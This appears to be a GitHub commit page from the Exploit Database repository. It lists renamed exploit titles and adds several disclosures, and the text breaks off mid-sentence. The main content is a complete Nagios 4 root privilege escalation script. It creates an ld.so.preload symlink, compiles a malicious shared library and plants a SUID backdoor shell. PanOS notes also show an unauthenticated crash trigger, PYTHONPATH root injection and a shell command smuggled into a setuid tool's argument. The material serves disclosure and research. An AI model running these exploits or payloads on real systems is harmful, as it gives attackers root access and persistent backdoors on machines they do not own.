Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (Metasploit)
Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) (Metasploit)

Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) (MS07-017) (Metasploit)
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (Metasploit)
Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (Metasploit)
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)
Microsoft Internet Explorer - CSS Recursive Import Use-After-Free (MS11-003) (Metasploit)

Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (Metasploit)
Microsoft Office Web Components (OWC) Spreadsheet - msDataSourceObject Memory Corruption (MS09-043) (Metasploit)
Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (Metasploit)
Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (Metasploit)
Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution (MS10-023) (Metasploit)
Microsoft OWC Spreadsheet - HTMLURL Buffer Overflow (MS09-043) (Metasploit)
Microsoft Help Center - Cross-Site Scripting / Command Execution (Metasploit)
Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (Metasploit)
Microsoft Help Center - Cross-Site Scripting / Command Execution (MS10-042) (Metasploit)
Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption (MS09-072) (Metasploit)

Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (Metasploit)
Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (MS10-090) (Metasploit)

Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (Metasploit)
Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption (MS09-002) (Metasploit)

Microsoft Internet Explorer - COM CreateObject Code Execution (Metasploit)
Microsoft Internet Explorer - COM CreateObject Code Execution (MS06-014/MS06-073) (Metasploit)

Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (2)
Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (MS06-057) (Metasploit) (2)

Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (Metasploit)
Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption (MS10-018) (Metasploit)

Microsoft Windows - Shell LNK Code Execution (Metasploit)
Microsoft Windows - Shell LNK Code Execution (MS10-046) (Metasploit)

Microsoft Internet Explorer - createTextRange() Code Execution (Metasploit)
Microsoft Internet Explorer - createTextRange() Code Execution (MS06-013) (Metasploit)

Microsoft Internet Explorer - Object Type (MS03-020)
Microsoft Internet Explorer - Object Type (MS03-020) (Metasploit)

Microsoft Internet Explorer - Data Binding Memory Corruption (Metasploit)
Microsoft Internet Explorer - Data Binding Memory Corruption (MS08-078) (Metasploit)

Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (Metasploit)
Microsoft Internet Explorer - DHTML Behaviour Use-After-Free (MS10-018) (Metasploit)
Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (1)
Microsoft Internet Explorer - (VML) Fill Method Code Execution (Metasploit)
Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution (Metasploit) (1)
Microsoft Internet Explorer - (VML) Fill Method Code Execution (MS06-055) (Metasploit)

Microsoft Internet Explorer - 'Aurora' Memory Corruption (Metasploit)
Microsoft Internet Explorer - 'Aurora' Memory Corruption (MS10-002) (Metasploit)

Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (Metasploit)
Microsoft Windows XP/2003/Vista - Metafile Escape() SetAbortProc Code Execution (MS06-001) (Metasploit)

CCProxy 6.2 - Telnet Proxy Ping Overflow (2) (Metasploit)
CCProxy 6.2 - Telnet Proxy Ping Overflow (Metasploit) (2)
Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
Outlook - ATTACH_BY_REF_RESOLVE File Execution (Metasploit)
Outlook - ATTACH_BY_REF_ONLY File Execution (Metasploit)
Microsoft Windows - ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP) (MS07-017) (Metasploit)
Microsoft Outlook - ATTACH_BY_REF_RESOLVE File Execution (MS10-045) (Metasploit)
Microsoft Outlook - ATTACH_BY_REF_ONLY File Execution (MS10-045) (Metasploit)

Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST)
Odin Secure FTP 4.1 - Stack Buffer Overflow (LIST) (Metasploit)

FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD)
FTPGetter Standard 3.55.0.05 - Stack Buffer Overflow (PWD) (Metasploit)

httpdx - tolog() Function Format String (1)
httpdx - tolog() Function Format String (Metasploit) (1)

Microsoft IIS FTP Server - NLST Response Overflow (Metasploit)
Microsoft IIS FTP Server - NLST Response Overflow (MS09-053) (Metasploit)
Microsoft Message Queueing Service - Path Overflow (Metasploit)
Microsoft DNS RPC Service - extractQuotedChar() Overflow (TCP)
Microsoft RPC DCOM Interface - Overflow Exploit (Metasploit)
Microsoft Message Queueing Service - DNS Name Path Overflow (Metasploit)
Microsoft Message Queueing Service - Path Overflow (MS05-017) (Metasploit)
Microsoft DNS RPC Service - extractQuotedChar() TCP Overflow (MS07-029) (Metasploit)
Microsoft RPC DCOM Interface - Overflow Exploit (MS03-026) (Metasploit)
Microsoft Message Queueing Service - DNS Name Path Overflow (MS07-065) (Metasploit)

IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (2)
IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (Metasploit) (2)

Novell ZENworks Configuration Management 10.2.0 - Remote Execution (1)
Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (1)

httpdx - tolog() Function Format String (2)
httpdx - tolog() Function Format String (Metasploit) (2)

Exchange 2000 - XEXCH50 Heap Overflow (MS03-046)
Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (MS03-046) (Metasploit)

NetSupport Manager Agent - Remote Buffer Overflow (2)
NetSupport Manager Agent - Remote Buffer Overflow (Metasploit) (2)

Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (1)
Apple iPhone MobileSafari LibTIFF - 'browser' Buffer Overflow (Metasploit) (1)

Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (2)
Apple iPhone MobileSafari LibTIFF - 'email' Buffer Overflow (Metasploit) (2)

SquirrelMail PGP Plugin - Command Execution (SMTP)
SquirrelMail PGP Plugin - Command Execution (SMTP) (Metasploit)

ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
ToolTalk - rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) (Metasploit)

Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (2)
Wireshark 1.4.4 - packet-dect.c Stack Buffer Overflow (Metasploit) (2)

Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050)
Microsoft Internet Explorer - MSHTML!CObjectElement Use-After-Free (MS11-050) (Metasploit)

Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview (.lzh attachment)
Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview ('.lzh' Attachment) (Metasploit)

Mozilla Firefox - 'nsTreeRange' Dangling Pointer (1)
Mozilla Firefox - 'nsTreeRange' Dangling Pointer (Metasploit) (1)

Mozilla Firefox 3.6.16 - mChannel Use-After-Free (1)
Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1)

Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026)
Microsoft MPEG Layer-3 Audio - Stack Based Overflow (MS10-026) (Metasploit)

ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (2)
ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (Metasploit) (2)

Mozilla Firefox - Array.reduceRight() Integer Overflow (2)
Mozilla Firefox - Array.reduceRight() Integer Overflow (Metasploit) (2)

Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (Metasploit)
Microsoft Internet Explorer - JavaScript OnLoad Handler Remote Code Execution (MS05-054) (Metasploit)

Mozilla Firefox 3.6.16 - mChannel Use-After-Free (2)
Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (2)

Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004)
Microsoft Windows - midiOutPlayNextPolyEvent Heap Overflow (MS12-004) (Metasploit)

Sun Java Web Start Plugin - Command Line Argument Injection (2012)
Sun Java Web Start Plugin - Command Line Argument Injection (2012) (Metasploit)

Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002)
Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)

Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027)
Microsoft Windows - MSCOMCTL ActiveX Buffer Overflow (MS12-027) (Metasploit)

quickshare file share 1.2.1 - Directory Traversal (2)
quickshare file share 1.2.1 - Directory Traversal (Metasploit) (2)

Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (Metasploit)
Microsoft IIS - MDAC 'msadcs.dll' RDS DataStub Content-Type Overflow (MS02-065) (Metasploit)

Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037)
Microsoft Internet Explorer - Same ID Property Deleted Object Handling Memory Corruption (MS12-037) (Metasploit)
ComSndFTP 1.3.7 Beta - USER Format String (Write4)
Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (Metasploit)
ComSndFTP 1.3.7 Beta - USER Format String (Write4) (Metasploit)
Microsoft XML Core Services - MSXML Uninitialized Memory Corruption (MS12-043) (Metasploit)

Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL redirection
Microsoft Internet Explorer 5.0/4.0.1 - JavaScript URL Redirection (MS99-043)

Microsoft Office SharePoint Server 2007 - Remote Code Execution (Metasploit)
Microsoft Office SharePoint Server 2007 - Remote Code Execution (MS10-104) (Metasploit)

Microsoft IIS 3.0/4.0 / Microsoft index server 2.0 - Directory Traversal
Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)

Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (Metasploit)
Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (MS12-037) (Metasploit)

Microsoft Internet Explorer 5.5 - Index.dat
Microsoft Internet Explorer 5.5 - 'Index.dat' Exploit (MS00-055)

Microsoft Visual Studio RAD Support - Buffer Overflow (Metasploit)
Microsoft Visual Studio RAD Support - Buffer Overflow (MS03-051) (Metasploit)

JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet)
JBoss - DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) (Metasploit)

Microsoft Internet Explorer 5 - Zone Spoofing
Microsoft Internet Explorer 5 - Zone Spoofing (MS01-055)

HP SiteScope - Remote Code Execution (1)
HP SiteScope - Remote Code Execution (Metasploit) (1)

Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure
Microsoft Internet Explorer 5 - Cascading Style Sheet File Disclosure (MS02-023)

Metasploit Web UI - Diagnostic Console Command Execution
Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)

Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address
Microsoft IIS 4.0/5.0 - SMTP Service Encapsulated SMTP Address (MS99-027)

Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant
Microsoft Internet Explorer 5 - Dialog Same Origin Policy Bypass Variant (MS02-047)

Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063)
Microsoft Internet Explorer - execCommand Use-After-Free (MS12-063) (Metasploit)

Microsoft Internet Explorer 5 - XML Page Object Type Validation
Microsoft Internet Explorer 5 - XML Page Object Type Validation (MS03-040)

Microsoft Windows XP/2000 - Messenger Service Buffer Overrun
Microsoft Windows XP/2000 - Messenger Service Buffer Overrun (MS03-043)

Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass
Microsoft Internet Explorer 5.0.1 - ITS Protocol Zone Bypass (MS04-013)

Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy
Microsoft Internet Explorer 5 - NavigateAndFind() Cross-Zone Policy (MS04-004)

Microsoft Internet Explorer - Option Element Use-After-Free (Metasploit)
Microsoft Internet Explorer - Option Element Use-After-Free (MS11-081) (Metasploit)

Java Applet JMX - Remote Code Execution (1)
Java Applet JMX - Remote Code Execution (Metasploit) (1)

myServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting
MyServer 0.6.2 - math_sum.mscgi Multiple Parameter Cross-Site Scripting

VMware OVF Tools - Format String (1)
VMware OVF Tools - Format String (Metasploit) (1)

VMware OVF Tools - Format String (2)
VMware OVF Tools - Format String (Metasploit) (2)
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)
Java Applet JMX - Remote Code Execution (2)
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)
Java Applet JMX - Remote Code Execution (Metasploit) (2)

Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code
Microsoft Internet Explorer 5.x - Valid File Drag and Drop Embedded Code (MS04-038)

Novell ZENworks Configuration Management 10.2.0 - Remote Execution (2)
Novell ZENworks Configuration Management 10.2.0 - Remote Execution (Metasploit) (2)

phpMyAdmin - Authenticated Remote Code Execution via preg_replace()
phpMyAdmin - 'preg_replace' Authenticated Remote Code Execution (Metasploit)

Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow
Microsoft Internet Explorer 5.0.1 - Content Advisor File Handling Buffer Overflow (MS05-020)

Microsoft Internet Explorer - textNode Use-After-Free (Metasploit)
Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit)

Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009)
Microsoft Internet Explorer - COALineDashStyleArray Integer Overflow (MS13-009) (Metasploit)

D-Link Devices - Unauthenticated Remote Command Execution (2)
D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (2)

D-Link Devices - Unauthenticated Remote Command Execution (1)
D-Link Devices - Unauthenticated Remote Command Execution (Metasploit) (1)

Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059)
Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059) (Metasploit)
Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055)
HP SiteScope - Remote Code Execution (2)
Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055) (Metasploit)
HP SiteScope - Remote Code Execution (Metasploit) (2)
CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (2)
Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)
Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)
CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (Metasploit) (2)
Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069) (Metasploit)
Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)

Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080)
Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080) (Metasploit)
Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090)
Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022)
Microsoft Internet Explorer - CardSpaceClaimCollection ActiveX Integer Underflow (MS13-090) (Metasploit)
Microsoft Internet Explorer - COALineDashStyleArray Unsafe Memory Access (MS12-022) (Metasploit)

Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)
Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012) (Metasploit)

Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012)
Microsoft Internet Explorer - CMarkup Use-After-Free (MS14-012) (Metasploit)

Microsoft Windows Media Center - MCL Exploit (MS15-100)
Microsoft Windows Media Center - MCL Exploit (MS15-100) (Metasploit)

Advantech Switch - Bash Environment Variable Code Injection (Shellshock)
Advantech Switch - Bash Environment Variable Code Injection (Shellshock) (Metasploit)

Oracle BeeHive 2 - voice-servlet processEvaluation()
Oracle BeeHive 2 - voice-servlet processEvaluation() (Metasploit)

Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference
Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference (MS15-134)

IPFire - Bash Environment Variable Injection (Shellshock)
IPFire - Bash Environment Variable Injection (Shellshock) (Metasploit)

Ruby on Rails - Dynamic Render File Upload / Remote Code Execution
Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)

FTPShell Client 5.24 - 'PWD' Remote Buffer Overflow

Windows x64 - Reverse Shell TCP Shellcode (694 bytes)

phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (2)
phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (Metasploit) (2)

PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2)
PmWiki 2.2.34 - (pagelist) Remote PHP Code Injection (2) (Metasploit)
Wordpress Plugin BBS e-Franchise 1.1.1 - SQL Injection
Wordpress Plugin Product Catalog 8 1.2.0 - SQL Injection
EditMe CMS - Cross-Site Request Forgery (Add New Admin)

Loading branch information

Offensive Security committed Nov 19, 2016

1 parent b22e315 commit 8948e76

files.csv

Large diffs are not rendered by default.

platforms/linux/dos/40790.txt

-Original file line number
+Diff line change
@@ -0,0 +1,53 @@
+    Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=908
+    Palo Alto Networks have published a fix for this issue: http://securityadvisories.paloaltonetworks.com/Home/Detail/68
+    PanOS uses a modified version of the appweb3 embedded webserver, it's used for
+    a variety of tasks and is enabled by default. I've noticed a bug in the core utility routine mprItoa:
+    char *mprItoa(char *buf, int size, int64 value, int radix);
+    https://embedthis.com/appweb/doc-3/ejs/api/mpr.html#mpr_8h_1c44ccf179c55dbbcf7aa04ba86090463
+    The size parameter is documented to be the size of the buffer at *buf, but if
+    the value exceeds that it will write one more byte than that as a nul
+    terminator.
+    Note that appweb3 has been EOL since 2012 and no longer receives security
+    updates and is not supported by the developer, so security maintenance is the
+    responsibility of Palo Alto Networks. It seems crazy to ship a EOL web server,
+    but whatever.
+    I've found an unauthenticated php script that an attacker call force to invoke
+    mprItoa() on a default installation at /unauth/php/errorPage.php, it can be
+    called like so:
+    /unauth/php/errorPage.php?code=1e16
+    This example should corrupt the stored GOT pointer, resulting in some
+    unexpected routine being called on the attacker-controlled MaResponse object,
+    and crashing with some heap corruption.
+    *** glibc detected *** /usr/local/bin/appweb3: double free or corruption (out): 0x08229e98 ***
+    ======= Backtrace: =========
+    /lib/libc.so.6[0xf7ee8786]
+    /lib/libc.so.6(cfree+0x59)[0xf7ee8bb9]
+    /usr/local/bin/../lib/3p/libappweb3.so.1(maFillHeaders+0x128)[0xf7e64c58]
+    /usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6793b]
+    /usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueue+0x28)[0xf7e608f8]
+    /usr/local/bin/../lib/3p/libappweb3.so.1(maServiceQueues+0x38)[0xf7e5f438]
+    /usr/local/bin/../lib/3p/libappweb3.so.1(maRunPipeline+0x37)[0xf7e5f497]
+    /usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e6346d]
+    /usr/local/bin/../lib/3p/libappweb3.so.1(maProcessReadEvent+0x27f)[0xf7e63e0f]
+    /usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e5ad74]
+    /usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e36afd]
+    /usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e3607c]
+    /usr/local/bin/../lib/3p/libappweb3.so.1[0xf7e30c6f]
+    /usr/local/bin/../lib/3p/libappweb3.so.1(threadProcWrapper+0x36)[0xf7e31296]
+    /lib/libpthread.so.0[0xf6e9b6e1]
+    /lib/libc.so.6(clone+0x5e)[0xf7f52aee]
+    ======= Memory map: ========
+    08048000-0804c000 rwxp 00000000 08:02 67709                              /usr/local/bin/appweb3
+c000-095e5000 rwxp 00000000 00:00 0                                  [heap]
+    f1c00000-f1cd0000 rwxp 00000000 00:00 0
+    etc.

platforms/linux/local/40774.sh

-Original file line number
+Diff line change
@@ -0,0 +1,192 @@
+    Affected Product:    Nagios 4
+    Vulnerability Type:   root privilege escalation
+    Fixed in Version: N/A
+    Vendor Website:      	https://www.nagios.com/
+    Software Link: : 	https://sourceforge.net/projects/nagios/files/latest/download?source=directory-featured
+    Affected Version: 4.2.2 and prior
+    Tested on: Ubuntu
+    Remote Exploitable:  No
+    Reported to vendor:  8 november 2016
+    Disclosed to public:
+    Release mode:        Responsible Disclosure
+    CVE-2016-8641 Nagios 4.2.2 - root privilege escalation
+    Credits:   Vincent Malguy
+    Description (from wikipedia) :
+    Nagios /ˈnɑːɡiːoʊs/, now known as Nagios Core, is a free and open source computer-software application that monitors systems, networks and infrastructure. Nagios offers monitoring and alerting services for servers, switches, applications and services. It alerts users when things go wrong and alerts them a second time when the problem has been resolved.
+    ********************* CVE-2016-8641 Nagios 4.2.2 - root privilege escalation  *********************
+    Using official installation instruction  at https://assets.nagios.com/downloads/nagioscore/docs/nagioscore/4/en/quickstart-ubuntu.html,
+    nagios' user is create with a shell :
+    Create a new nagios user account and give it a password.
+    /usr/sbin/useradd -m -s /bin/bash nagios
+    leading to a  entry in /etc/passwd like this "nagios:x:1001:1001::/home/nagios:/bin/bash"
+    This means that if someone has access to the nagios account, he can access any files own by nagios.
+    The Nagios startup script, run by root, is insecurely giving owner of file to nagios use :
+    (/etc/init.d/nagios: line 190)
+    touch $NagiosRunFile
+    chown $NagiosUser:$NagiosGroup $NagiosRunFile $NagiosVarDir/nagios.log $NagiosRetentionFile
+    If Nagios user symlink $NagiosRunFile to a file that he has no access to, at startup or reboot   of the nagios daemon, the init script with give him ownership of the linked file.
+    Exploit :
+    #!/bin/bash -p
+    #
+    TARGETSERVICE="Nagios"
+    LOWUSER="nagios"
+    TARGETPATH="/usr/local/nagios/var/nagios.lock"
+    BACKDOORSH="/bin/bash"
+    BACKDOORPATH="/tmp/rootbackdoor"
+    PRIVESCLIB="/tmp/privesclib.so"
+    PRIVESCSRC="/tmp/privesclib.c"
+    SUIDBIN="/usr/bin/sudo"
+    function cleanexit {
+    # Cleanup
+    echo -e "\n[+] Cleaning up..."
+    rm -f $PRIVESCSRC
+    rm -f $PRIVESCLIB
+    rm -f $TARGETPATH
+    touch $TARGETPATH
+    if [ -f /etc/ld.so.preload ]; then
+    echo -n > /etc/ld.so.preload
+    fi
+    echo -e "\n[+] Job done. Exiting with code $1 \n"
+    exit $1
+    }
+    function ctrl_c() {
+            echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
+    cleanexit 0
+    }
+    #intro
+    echo -e "\033[94m \nNagios - Root Privilege Escalation PoC Exploit \nNagios-chowned.sh (ver. 1.0)\n\nCVE-2016-XXXX \n"
+    echo -e "Discovered by: Vincent Malguy\n Original exploit code borrow from Dawid Golunski http://legalhackers.com (Thanks!)\033[0m"
+    # Priv check
+    echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m"
+    id | grep -q ${LOWUSER}
+    if [ $? -ne 0 ]; then
+    echo -e "\n[!] You need to execute the exploit as ${LOWUSER} user! Exiting.\n"
+    exit 3
+    fi
+    echo -e "\n[+] Target ${LOWUSER} file set to $TARGETPATH "
+    # [ Active exploitation ]
+    trap ctrl_c INT
+    # Compile privesc preload library
+    echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
+    cat <<_solibeof_>$PRIVESCSRC
+    #define _GNU_SOURCE
+    #include <stdio.h>
+    #include <sys/stat.h>
+    #include <unistd.h>
+    #include <dlfcn.h>
+           #include <sys/types.h>
+           #include <sys/stat.h>
+           #include <fcntl.h>
+    uid_t geteuid(void) {
+    static uid_t  (*old_geteuid)();
+    old_geteuid = dlsym(RTLD_NEXT, "geteuid");
+    if ( old_geteuid() == 0 ) {
+    chown("$BACKDOORPATH", 0, 0);
+    chmod("$BACKDOORPATH", 04777);
+    //unlink("/etc/ld.so.preload");
+    }
+    return old_geteuid();
+    }
+    _solibeof_
+    /bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
+    if [ $? -ne 0 ]; then
+    echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
+    cleanexit 2;
+    fi
+    # Prepare backdoor shell
+    cp $BACKDOORSH $BACKDOORPATH
+    echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
+    # Safety check
+    if [ -f /etc/ld.so.preload ]; then
+    echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
+    exit 2
+    fi
+    # Symlink the log file to /etc
+    rm -f $TARGETPATH && ln -s /etc/ld.so.preload $TARGETPATH
+    if [ $? -ne 0 ]; then
+    echo -e "\n[!] Couldn't remove the $TARGETPATH file or create a symlink."
+    cleanexit 3
+    fi
+    echo -e "\n[+] Symlink created at: \n`ls -l $TARGETPATH`"
+    # Kill target service if possible
+    #echo -ne "\n[+] Killing ${TARGETSERVICE}...\n"
+    #killall ${TARGETSERVICE}
+    # Wait for target service startup to re-create target file
+    echo -ne "\n[+] Waiting for ${TARGETSERVICE} startup to re-create the ${TARGETPATH}...\n"
+    while :; do
+    # if target file can be recreated by target process (like logs files), we need to keep remove and link it
+    rm -f $TARGETPATH && ln -s /etc/ld.so.preload $TARGETPATH
+    sleep 0.1
+    if [ -f /etc/ld.so.preload ]; then
+    echo $PRIVESCLIB > /etc/ld.so.preload
+    rm -f $TARGETPATH
+    break;
+    fi
+    done
+    # /etc/ld.so.preload dir should be owned by our low priv controled  user at this point
+    # Inject the privesc.so shared library to escalate privileges
+    echo $PRIVESCLIB > /etc/ld.so.preload
+    echo -e "\n[+] ${TARGETSERVICE} restarted. The /etc/ld.so.preload file got created with ${LOWUSER} privileges: \n`ls -l /etc/ld.so.preload`"
+    echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
+    echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
+    chmod 755 /etc/ld.so.preload
+    # Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
+    echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
+    sudo 2>/dev/null >/dev/null
+    # Check for the rootshell
+    ls -l $BACKDOORPATH
+    ls -l $BACKDOORPATH | grep rws | grep -q root
+    if [ $? -eq 0 ]; then
+    echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
+    echo -e "\n\033[94mGot root! The ${TARGETSERVICE} server has been ch-OWNED !\033[0m"
+    else
+    echo -e "\n[!] Failed to get root"
+    cleanexit 2
+    fi
+    # Execute the rootshell
+    echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
+    $BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
+    $BACKDOORPATH -p
+    # Job done.
+    cleanexit 0

platforms/linux/local/40788.txt

-Original file line number
+Diff line change
@@ -0,0 +1,20 @@
+    Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=912
+    The setuid root executable /usr/local/bin/root_trace essentially just does setuid(0) then system("/usr/local/bin/masterd"), which is a python script:
+    $ ls -l /usr/local/bin/root_trace
+    -rwsr-xr-x 1 root root 12376 Oct 17  2014 /usr/local/bin/root_trace
+    As the environment is not scrubbed, you can just do something like this:
+    $ cat /tmp/sysd.py
+    import os
+    os.system("id")
+    os._exit(0);
+    $ PYTHONPATH=/tmp root_trace
+    uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
+    This was fixed by PAN:
+    http://securityadvisories.paloaltonetworks.com/Home/Detail/67

platforms/linux/local/40789.txt

-Original file line number
+Diff line change
@@ -0,0 +1,44 @@
+    Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=913
+    This was fixed by PAN: http://securityadvisories.paloaltonetworks.com/Home/Detail/67
+    The root_reboot utility is setuid root, but performs multiple calls to system() with attacker controlled data, such as this one:
+    .text:0804870F C7 44 24 04 78+                mov     dword ptr [esp+4], offset aUsrLocalBinPan ; "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 "...
+    .text:08048717 89 04 24                       mov     [esp], eax      ; char **
+    .text:0804871A E8 0D FE FF FF                 call    _asprintf
+    .text:0804871F 8B 45 E8                       mov     eax, [ebp+new]
+    .text:08048722 85 C0                          test    eax, eax
+    .text:08048724 0F 84 B9 01 00+                jz      loc_80488E3
+    .text:0804872A 89 04 24                       mov     [esp], eax      ; command
+    .text:0804872D E8 9A FD FF FF                 call    _system
+    Which is trying to do this:
+      if (setuid(0) < 0)
+      {
+        fprintf(stderr, "%s: Can't setuid to reboot system\n");
+      }
+      if (reason) {
+       asprintf(&new, "/usr/local/bin/pan_elog -i 1 -e 3 -s 4 -m \"The system is shutting down due to %s.\"", reason);
+       system(new);
+       free(new);
+      }
+    This is trivially exploitable, for example:
+    $ ls -l /usr/local/bin/root_reboot
+    -rwsr-xr-x 1 root root 16275 Oct 17  2014 /usr/local/bin/root_reboot
+    $ root_reboot --restart '"; bash -i; echo "'
+    # id
+    uid=0(root) gid=502(admin) groups=501(noradgrp),502(admin)
+    Palo Alto pointed out that they had already fixed this bug in an update that I needed to apply:
+    https://securityadvisories.paloaltonetworks.com/Home/Detail/45
+    However, looking at the fix they had essentially just checked that each character in the "reason" parameter was alphanumeric or white space. This does not prevent exploitation, you can just do this:
